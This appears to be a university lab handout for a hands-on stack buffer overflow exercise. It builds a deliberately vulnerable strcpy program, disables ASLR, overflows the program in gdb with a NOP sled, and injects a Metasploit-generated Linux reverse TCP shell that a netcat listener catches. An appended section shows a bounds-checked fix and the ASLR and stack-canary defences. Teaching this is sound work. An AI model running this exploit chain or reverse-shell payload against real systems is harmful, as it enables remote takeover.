itp125 - lab 5 - buffer overflow in backtrack3

ITP 125 – Lab 5 – Simple Buffer Overflow with Backtrack 3

Due: When IPv6 runs out of IP addresses
Submission: No submission needed

This is the program that you will be writing:

    // vuln-prog.c
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    // Copies the caller-supplied string into a fixed 1024-byte stack buffer
    // with no length check: this is the deliberate overflow the lab studies.
    int bof(char *string)
    {
        char buffer[1024];
        strcpy(buffer, string);
        return 1;
    }

    int main(int argc, char *argv[])
    {
        bof(argv[1]);
        printf("Done..\n");
        return 1;
    }

Understanding Buffer Overflows

1. Start up the Backtrack3 virtual machine.
2. Log in to the Linux system with the following credentials:
       user: root
       password: toor
3. Start up X Windows by typing the following on the command line:
       # startx
   Note: Do not type the #; it is used to represent the terminal prompt.
4. Open a new terminal and do the following:
   1. The terminal is on the bottom left, the icon with the monitor.
   2. Disable the kernel's address-space layout randomization (ASLR), so the stack sits at the same address on every run:
          # echo 0 > /proc/sys/kernel/randomize_va_space
   3. Type in the program above:
          # nano -w vuln-prog.c
      Note: To save the file press CTRL-O, then press ENTER. To exit the text editor, press CTRL-X.
   4. Compile the program you just wrote with the following command:
          # gcc vuln-prog.c -o vuln-prog
      Note: Make sure there aren't any errors with the program before you continue.
   5. Run the program to make sure it works:
          # ./vuln-prog HelloWorld

The Debugger and Testing the Application

1. To start the debugger, in the terminal type the following:
       # gdb ./vuln-prog
2. Run the application using the following command:
       (gdb) run `perl -e 'print "A"x1032'`
   Note: Be careful of the `, ' and " characters; make sure you have all the right quotes. Also do not type (gdb); it is used to represent the debugger console.
3. Look at the registers that were affected:
       (gdb) i r

Creating the Payload

Note: Read through "Creating the Payload" once. After you understand it, you can go to the Reference section and create the payload without using the web browser. If you followed the reference command, you will still need to do step 4 of this section!

1. Start up a new terminal and run the following:
       # /msf3/msfweb
   Note: Do not close the terminal; just leave it running.
2. Start up Firefox.
   o Type the following location in the URL bar: http://localhost:55555
   o Disable NoScript for the page by pressing the "Options" button in the yellow bar at the bottom of the browser, then select "Allow http://localhost:55555".
3. On the web page:
   o Select "Payloads".
   o Search for "Linux command shell, reverse".
   o Select the payload "Linux Command Shell, Reverse TCP Inline".
     Note: Make sure the architecture is x86.
   o Before generating the payload, enter the following:
         LPORT: 9999
         LHOST: 127.0.0.1
         Restricted Characters: 0x00 0x0a 0x0d 0x20 0x25
         Format: C
4. Copy the payload, which is located in the variable buf =
   Note: When the shellcode is generated, remember its size in bytes.
   o Open KEdit: Start -> Editors -> KEdit
   o Paste the payload and remove the " characters and all the newlines. In other words, make sure everything is on a single line.

Starting a Listener

1. Start a new terminal and type the following:
       # nc -l -p 9999 -vv

Putting It All Together

1. Go back to the gdb terminal and type the following:
       (gdb) run `perl -e 'print "A"x600,"\x90"x<# of nops calculated>,"<shellcode you made in msfweb>","BBBB"'`
   Note: Do not type the <> or anything between them. You need to fill that in with the calculation you did and the shellcode you generated. To calculate the number of NOPs:
       1032 - 600 - 4 - size of the shellcode = # of NOPs
   At the end of the command, make sure there is a ", a ' and a `.
   If you did everything right, you should see B's as the EIP.
2. Now you need to find the location of the NOPs to jump to:
   o In gdb, examine the program's memory:
         (gdb) x/2000xb $esp
     Note: Press ENTER until you find a bed of NOPs (0x90 bytes). Pick a memory address that has all NOPs.
3. Now enter the address you picked into the command:
       (gdb) run `perl -e 'print "A"x600,"\x90"x<# of nops calculated>,"<shellcode you made in msfweb>","<address you picked>"'`
   Note: The address you picked must be entered backwards, byte by byte, because x86 stores it in little-endian order. For example, 0xbf ff f4 40 becomes \x40\xf4\xff\xbf when you enter it into gdb.
4. Go back to the terminal where you started netcat.
   o If everything worked you should see "connected to..."
   o Type in a Linux command to see if it worked.

Reference

There is another way you can create the payload. You can do the following:

    # cd /pentest/exploits/framework3
    # msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.1.255 LPORT=9999 R | msfencode -a x86 -b '\x00\x0a\x0d\x20\x25' -t c

Note: Replace the LHOST IP address with the IP address of your own virtual machine.
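The lab's program overflows because strcpy() copies until it finds a NUL byte and never looks at the size of the destination. The following is an added example, not part of the lab handout or its vuln-prog.c: it places the lab's bof() next to a bounds-checked replacement that measures the input first and rejects anything that would not fit, and gives main() the argc check the original lacks. The names bof_vulnerable, bof_safe, BUF_SIZE and check_input_of_length are this example's own choices, and the 'A'-filled test inputs are constructed to mirror the perl padding used in the lab.

```c
/* Added example (not part of the lab handout): the lab's bof() next to a
 * bounds-checked replacement. bof_vulnerable, bof_safe, BUF_SIZE and
 * check_input_of_length are names chosen for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 1024

/* The lab's original function: strcpy() stops only at the NUL terminator,
 * so any argument of BUF_SIZE bytes or more writes past the end of buffer
 * and over the saved frame pointer and return address. Kept here for
 * comparison; nothing below calls it. */
int bof_vulnerable(char *string)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, string);
    return 1;
}

/* Hardened version: measure first, then copy only what fits. Returns 1 when
 * the whole string (plus its NUL) fits in the buffer, and 0 when the input
 * is too long and is rejected without being copied. */
int bof_safe(const char *string)
{
    char buffer[BUF_SIZE];
    size_t len = strlen(string);

    if (len >= BUF_SIZE) {
        /* Refuse the input rather than silently truncating it: a truncated
         * copy is still data the caller did not expect, and an oversized
         * argument is an event worth reporting. */
        buffer[0] = '\0';
        return 0;
    }
    memcpy(buffer, string, len + 1);   /* len + 1 includes the NUL */
    return 1;
}

/* Helper: build a constructed argument of n 'A' bytes (the same padding the
 * lab feeds via perl -e 'print "A"x1032') and run it through bof_safe().
 * Returns bof_safe()'s result, or -1 if allocation failed. */
int check_input_of_length(size_t n)
{
    char *arg = malloc(n + 1);
    int ok;

    if (arg == NULL)
        return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    ok = bof_safe(arg);
    free(arg);
    return ok;
}

int main(int argc, char *argv[])
{
    /* The lab's main() dereferences argv[1] unconditionally; check argc so
     * running with no argument does not crash. */
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (!bof_safe(argv[1])) {
        fprintf(stderr, "input of %zu bytes exceeds the %d-byte limit, rejected\n",
                strlen(argv[1]), BUF_SIZE - 1);
        return 1;
    }
    printf("Done..\n");
    return 0;
}
```

With this version, the lab's 1032-byte argument is refused before any copy happens, so there is no saved return address to overwrite and the EIP-control step cannot occur. The other half of the defence is what the lab switches off on purpose: writing 2 back to /proc/sys/kernel/randomize_va_space re-enables ASLR, so the stack address picked in gdb is not where the NOPs land on the next run, and building with gcc's -fstack-protector-all adds a canary below the saved return address that aborts the process when it is clobbered.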